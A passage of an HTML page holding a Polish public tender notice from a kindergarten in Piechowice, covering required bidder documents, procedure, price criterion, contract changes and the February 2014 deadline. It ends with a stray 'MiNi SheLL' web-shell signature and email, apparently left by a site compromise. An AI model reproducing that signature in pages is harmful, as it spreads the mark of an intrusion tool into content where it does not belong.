<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca po-twierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie z treścią załącznika nr 2 do SIWZ.Oświadczenie to przywołane jest w punkcie III.6) pkt 1) niniejszego ogłoszenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy -wzór oświadczenia wg. załącznika nr 2 do SIWZ, 2)Wypełniony i podpisany formularz oferty - wzór wg Załącznika nr 1 do SIWZ. 3)Dokument, z którego wynika upoważnienie osób-osoby do podpisania oferty w imieniu Wykonawcy lub pełnomocnictwo do reprezentowania Wykonawcy składa się w formie oryginału lub kopii poświadczonej przez notariusza za zgodność z oryginałem, o ile nie wynika ono z innych dokumentów załączonych do oferty przez Wykonawcę. 4)Dowodami, o których mowa w Wykazie usług (punkt 1, podpunkt 2, Rozdziału IV SIWZ oraz przywołanych w niniejszym ogłoszeniu w punkcie III.4.1) tiret pierwsze), jest: a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, b)oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w podpunkcie a). 5)W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej tj. w podpunkcie 4). 6)W razie konieczności, szczególnie gdy Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług lub dowody budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane , o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu. 7)Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 8)Dokumenty, o których mowa w rozporządzeniu Prezesa Rady Ministrów z dnia 19 lutego 2013 r., w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231), zgodnie z § 7 ust. 1 i 2, są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy PZP, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 8)W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia w myśl art. 23 ustawy PZP: a)należy do oferty załączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców. Pełnomocnictwo to może być złożone w formie oryginału lub kopii poświadczonej przez notariusza za zgodność z oryginałem. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia, b)dokumenty składane w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy PZP, dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia winien złożyć każdy z Wykonawców wspólnie ubiegających się o zamówienie, c)informację o przynależności do tej samej grupy kapitałowej albo informację o tym, że podmiot nie należy do grupy kapitałowej w rozumieniu przepisów ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów składa, każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 9)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się, o którym mowa w punkcie dotyczącym podmiotów zagranicznych, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 10)W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 11)Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne postanowienia do umowy zawiera wzór umowy - ZAŁĄCZNIK NR  7 do SIWZ.
2.Zamawiający dopuszcza możliwość dokonania  zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
a) zmianę cen jednostkowych, zaoferowanych przez Wykonawcę w ofercie przetargowej, w przypadku zmiany urzędowej stawki podatku VAT w okresie trwania umowy,
b)zmiana osoby, która będzie sporządzać jadłospisy po stronie Wykonawcy, musi być uzasadniona na piśmie przez Wykonawcę i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia mu pisemnej propozycji wyłącznie wtedy, gdy kwalifikacje i-lub doświadcze-nie wskazanej osoby (osób) będą spełniać warunki postawione w tym zakresie w SIWZ,
c)zmiana Podwykonawcy-ców wskazanych w ofercie przetargowej, na których zasoby Wykonawca powołuje się, na zasadach określonych w art. 26 ust. 2b ustawy PZP, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1  ustawy PZP i określonych szczegółowo w Rozdziale IV, pkt 1 SIWZ, pod warunkiem spełnienia wymagań zawartych w art. 36b ust. 2 ustawy Prawo zamówień publicznych.
3.Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiana  osób wskazanych do kontaktów między stronami umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> piechowice.bip.pbox.pl w zakładce Zamówienia publiczne-Zamówienia jednostek organizacyjnych gmin<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Samorządowe nr 1 w Piechowicach, z siedzibą 58-573 Piechowice, ul. Żymierskiego 77, pok. nr 8, I piętro - Gabinet Dyrektora Przedszkola..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2014 godzina 09:00, miejsce: Przedszkole Samorządowe nr 1 w Piechowicach, z siedzibą 58-573 Piechowice, ul. Żymierskiego 77, pok. nr 8, I piętro - Gabinet Dyrektora Przedszkola..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie nie jest finansowane ze środków Unii Europejskiej, 2.Otwarcie ofert nastąpi w dniu 17 lutego 2014 r. o godzinie 09:15 w siedzibie Zamawiającego tj. Przedszkole Samorządowe nr 1 w Piechowicach, z siedzibą 58-573 Piechowice, ul. Żymierskiego 77, pok. nr 8 I piętro - Gabinet Dyrektora Przedszkola..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com